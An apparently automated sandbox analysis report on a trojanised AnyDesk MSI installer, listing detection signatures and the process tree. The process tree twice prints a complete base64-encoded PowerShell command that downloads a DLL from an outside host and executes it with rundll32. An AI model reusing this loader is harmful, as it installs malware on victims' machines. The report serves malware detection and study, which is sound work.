Windows
Analysis Report
AnydeskSetup_26b30163.msi
Overview
General Information
Detection
Score | Range | Whitelisted | Confidence
---|---|---|---
100 | 0 - 100 | false | 100%
Signatures
Yara detected MalDoc
System process connects to network (likely due to code injection or exploit)
Sigma detected: Execute DLL with spoofed extension
Antivirus detection for URL or domain
Malicious encrypted Powershell command line found
Multi AV Scanner detection for domain / URL
Encrypted powershell cmdline option found
Powershell drops PE file
Deletes itself after installation
Drops executables to the windows directory (C:\Windows) and starts them
Found decision node followed by non-executed suspicious APIs
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Contains functionality to retrieve information about pressed keystrokes
Launches processes in debugging mode, may be used to hinder debugging
Checks for available system drives (often done to infect USB drives)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to read the clipboard data
Found dropped PE file which has not been started or loaded
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to launch a program with higher privileges
Found evasive API chain (may stop execution after accessing registry keys)
Classification
- System is w10x64
- msiexec.exe (PID: 8, cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\AnydeskSetup_26b30163.msi", MD5: 4767B71A318E201188A0D0A420C8B608)
- msiexec.exe (PID: 4312, cmdline: C:\Windows\system32\msiexec.exe /V, MD5: 4767B71A318E201188A0D0A420C8B608)
- msiexec.exe (PID: 1592, cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 98DB8D4E6DAAAA17E94E76B65ACF188B, MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
- MSI5344.tmp (PID: 2904, cmdline: "C:\Windows\Installer\MSI5344.tmp" /DontWait /HideWindow powershell.exe -Exec Bypass -enc JABmAHIAbwBtACAAPQAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAATIFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAEwAaQB0AGUAcwBvAGYAdABcAEkAbgBzAHQAYQBsAGwAIgApAC4AUABhAHQAaAAgAC0AbABlAGEAZgA7AA0ACgAkAGQAaQByACAAPQAgACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAOwANAAoAJABmAG4AIAA9ACAAJABkAGkAcgAgACsAIAAiAFwAIgAgACsAIAAoAEcAZQB0AC0AUgBhAG4AZABvAG0AKQAuAFQAbwBTAHQAcgBpAG4AZwAoACIAeAA4ACIAKQAgACsAIAAiAC4AZABhAHQAIgANAAoAJAB3AGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AA0ACgAkAGQAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AZABvAHcAbgBsAG8AYQBkAC0AYwBkAG4ALgBjAG8AbQAiADsADQAKACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGQAIAArACAAIgAvAGQAbwB3AG4AbABvAGEAZAAuAHAAaABwAD8AZgA9AEwAZAByAHAALgBkAGwAbAAmAGYAcgBvAG0APQAiACAAKwAgACQAZgByAG8AbQAsACAAJABmAG4AKQA7AA0ACgAkAHIAYQB3ACAAPQAgACIATQBaACIAIAArACAAKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAFAAYQB0AGgAIAAkAGYAbgAgAC0AUgBhAHcAKQAuAFIAZQBtAG8AdgBlACgAMAAsACAAMgApADsADQAKAFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACgAJABmAG4AKQAgAC0ATgBvAE4AZQB3AGwAaQBuAGUAIAAtAFYAYQBsAHUAZQAgACQAcgBhAHcADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACgAJwAiACcAIAArACAAJABmAG4AIAArACAAJwAiACwARABsAGwAUgBlAGcAaQBzAHQAZQByAFMAZQByAHYAZQByACcAKQA7AA==, MD5: 6AAC525CFCDD6D3978C451BBA2BB9CB3)
- powershell.exe (PID: 4440, cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Exec Bypass -enc JABmAHIAbwBtACAAPQAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAATIFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAEwAaQB0AGUAcwBvAGYAdABcAEkAbgBzAHQAYQBsAGwAIgApAC4AUABhAHQAaAAgAC0AbABlAGEAZgA7AA0ACgAkAGQAaQByACAAPQAgACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAOwANAAoAJABmAG4AIAA9ACAAJABkAGkAcgAgACsAIAAiAFwAIgAgACsAIAAoAEcAZQB0AC0AUgBhAG4AZABvAG0AKQAuAFQAbwBTAHQAcgBpAG4AZwAoACIAeAA4ACIAKQAgACsAIAAiAC4AZABhAHQAIgANAAoAJAB3AGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AA0ACgAkAGQAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AZABvAHcAbgBsAG8AYQBkAC0AYwBkAG4ALgBjAG8AbQAiADsADQAKACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGQAIAArACAAIgAvAGQAbwB3AG4AbABvAGEAZAAuAHAAaABwAD8AZgA9AEwAZAByAHAALgBkAGwAbAAmAGYAcgBvAG0APQAiACAAKwAgACQAZgByAG8AbQAsACAAJABmAG4AKQA7AA0ACgAkAHIAYQB3ACAAPQAgACIATQBaACIAIAArACAAKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAFAAYQB0AGgAIAAkAGYAbgAgAC0AUgBhAHcAKQAuAFIAZQBtAG8AdgBlACgAMAAsACAAMgApADsADQAKAFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACgAJABmAG4AKQAgAC0ATgBvAE4AZQB3AGwAaQBuAGUAIAAtAFYAYQBsAHUAZQAgACQAcgBhAHcADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACgAJwAiACcAIAArACAAJABmAG4AIAArACAAJwAiACwARABsAGwAUgBlAGcAaQBzAHQAZQByAFMAZQByAHYAZQByACcAKQA7AA==, MD5: 95000560239032BC68B4C2FDFCDEF913)
- conhost.exe (PID: 5940, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- rundll32.exe (PID: 2088, cmdline: "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",DllRegisterServer, MD5: 73C519F050C20580F8A62C849D49215A)
- rundll32.exe (PID: 2460, cmdline: "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",DllRegisterServer, MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
- rundll32.exe (PID: 5176, cmdline: "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",#2, MD5: 73C519F050C20580F8A62C849D49215A)
- rundll32.exe (PID: 3720, cmdline: "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",#2, MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
- rundll32.exe (PID: 5064, cmdline: "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",#2, MD5: 73C519F050C20580F8A62C849D49215A)
- rundll32.exe (PID: 3584, cmdline: "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",#2, MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
- cleanup
No configs have been found
Source | Rule | Description | Author | Strings
---|---|---|---|---
 | JoeSecurity_MalDoc | Yara detected MalDoc | Joe Security | 
Data Obfuscation
- Author: Joe Security
No Snort rule has matched
AV Detection
- Avira URL Cloud: 7 entries
- Virustotal: 1 entry (perma link)
- Avira: 1 entry

- HTTPS traffic detected: 2 entries
- Binary string: 5 entries
- File opened: 31 entries
- Code function: 7_2_04A07390, 7_2_04A07750, 7_2_04A03AA0, 7_2_04A03D50, 9_2_00FC7750, 9_2_00FC3AA0, 9_2_00FC7390, 9_2_00FC3D50
Networking